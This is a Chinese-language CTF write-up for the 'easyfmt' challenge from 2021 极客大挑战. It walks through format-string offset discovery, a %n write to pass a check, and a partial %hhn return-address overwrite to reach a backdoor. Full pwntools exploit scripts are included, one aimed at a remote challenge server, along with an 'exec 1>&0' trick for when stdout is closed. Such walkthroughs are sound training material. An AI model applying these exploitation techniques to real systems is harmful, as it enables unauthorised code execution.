其他分享
首页 > 其他分享> > easyfmt--2021极客大挑战

easyfmt--2021极客大挑战

作者:互联网

这道题目是格式化字符串漏洞的一道题目,还涉及到了重定向。记录一下,这是可是详细讲解,不会的同学可以看一下。

我们来看一下题目内容

 

 

 主函数没有什么说的,直接来看vuln函数。

 

 

 题目大眼一看有两处格式化字符串漏洞。遇到这个一般是先找偏移。通常来说是先输入一串%p,通过输出的内容来数偏移。但是这里一开始只让你输入13个字符串,这咋计算呢。我这只有一个笨方法。

就是输入aaaa%1$p 从一开始一个一个试,aaaa%2$p,aaaa%3$p ......知道试到15就出现了

 

 

 因为程序是32位程序,所以第一个格式化字符串漏洞的偏移就是15了,那么找到偏移我们如何利用的呢。再回到上面的vuln函数中有一个if 语句判断v3是否等于12,如果不等于12程序就直接退出了。

这里肯定是利用格式化字符串漏洞先把v3的值改成12。如何改?看到程序运行时先把v3的地址给输出出来。我们把payload先构成这样:

pl = p32(v3_addr)+'%8c%15$n'

 v3的地址你先接受一下

r.recvuntil('First step:\n')
v3_addr= int(r.recvuntil('\n'),16)

 这样我们就可以把v3的值修改成12。

接下来就可测试下一个格式化字符串的偏移。如果是直接gdb 调试我们不容易进入下一个格式化字符串那个位置。我的办法是写exp调试

from pwn import *
context.log_level = 'debug'
#context.terminal=['gnome-terminal','-x','sh','-c']
r = lambda : p.recv()
rx = lambda x: p.recv(x)
ru = lambda x: p.recvuntil(x)
rud = lambda x: p.recvuntil(x, drop=True)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
close = lambda : p.close()
debug = lambda : gdb.attach(p)
shell = lambda : p.interactive()

p = process('./pwn')
#p = remote('123.57.230.48','12342')
elf = ELF('./pwn')
backdoor = 0x0804874d
gdb.attach(p,'b *0x08048685')
ru('First step:\n')
target = int(rud('\n'),16)
pl = p32(target)+'%8c%15$n'
success(hex(target))
sl(pl)

pl ='aaaa'+'%p%p%p%p%p%p%p%p'
sla('there',pl)


shell()

 

 

 我们在第三个printf那里下一个断点。运行exp时会弹出一个终端。

 

 

 输入c是继续调试。n下一步,直到执行完call printf

我们回到开始的终端页面(运行exp那个页面)

 

 

 这里就可以看出第二个偏移时7了。那如何利用呢?

我还是的gdb调试

在 vuln下断点。

 

 

 这是输出v3的地址。接下来我们查看栈中的内容。

 

 

 我们可以看到这个地址和返回地址相差了0x10,程序给了后门函数。backdoor = 0x0804874d。我们可以发现返回地址中保存的内容也是一个地址,而且呢与后门函数长得非常相似,那么思路就来了。把返回地址中的地址的最后一字节修改成4d

这不就直接可以返回后门函数了嘛。为啥这么做呢,因为第二个scanf输入也受到了限制。只让你输入20个字符无法造成溢出。到这里还没完呢!

 

 

 这里有一个close()函数。这就关闭了输入,你ls就没发用了。

0和1是linux下的文件描述符。
在Linux中一切皆文件,文件描述符(file descriptor)是内核为了高效管理已被打开的文件所创建的索引,是一个非负整数(通常是小整数),用于指代被打开的文件,所有执行I/O操作的系统调用都通过文件描述符。程序刚刚启动的时候,0是标准输入,1是标准输出,2是标准错误。如果此时去打开一个新的文件,它的文件描述符会是3。
标准输入输出的指向是默认的,我们可以修改它们的指向,也即重定位
举例子,可以用exec 1>myoutput把标准输出重定向到myoutput文件中,也可以用exec 0<myinput把标准输入重定向到myinput文件中,而且,文件名字可以用&+文件描述符来代替。
那么问题到这里就解决了,三条语句中close(1);close(2)即把标准输出和标准错误输出关闭,然后我们可以执行 exec 1>&0,也就是把标准输出重定向到标准输入,因为默认打开一个终端后,0,1,2都指向同一个位置也就是当前终端,所以这条语句相当于重启了标准输出,此时就可以执行命令并且看得到输出了

 

我们getshell时先输入一个exec 1>&0再ls

from pwn import *
# context.log_level = 'debug'

r = lambda : p.recv()
rx = lambda x: p.recv(x)
ru = lambda x: p.recvuntil(x)
rud = lambda x: p.recvuntil(x, drop=True)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
close = lambda : p.close()
debug = lambda : gdb.attach(p)
shell = lambda : p.interactive()

# p = process('./pwn')
p = remote('123.57.230.48','12342')
elf = ELF('./pwn')
backdoor = 0x0804874d
# gdb.attach(p,'b *0x08048685')
ru('First step:\n')
target = int(rud('\n'),16)
pl = p32(target)+'%8c%15$n'
success(hex(target))
sl(pl)

pl = p32(target+0x10)+'%'+str((backdoor&0xff)-4)+'c%7$hhn'
sla('there',pl)
shell()

原exp2021极客大挑战WP集合_Ocean的博客-CSDN博客

 

标签:极客,easyfmt,target,--,v3,p%,close,pl,lambda
来源: https://www.cnblogs.com/Mua2Uncle2blog/p/15587420.html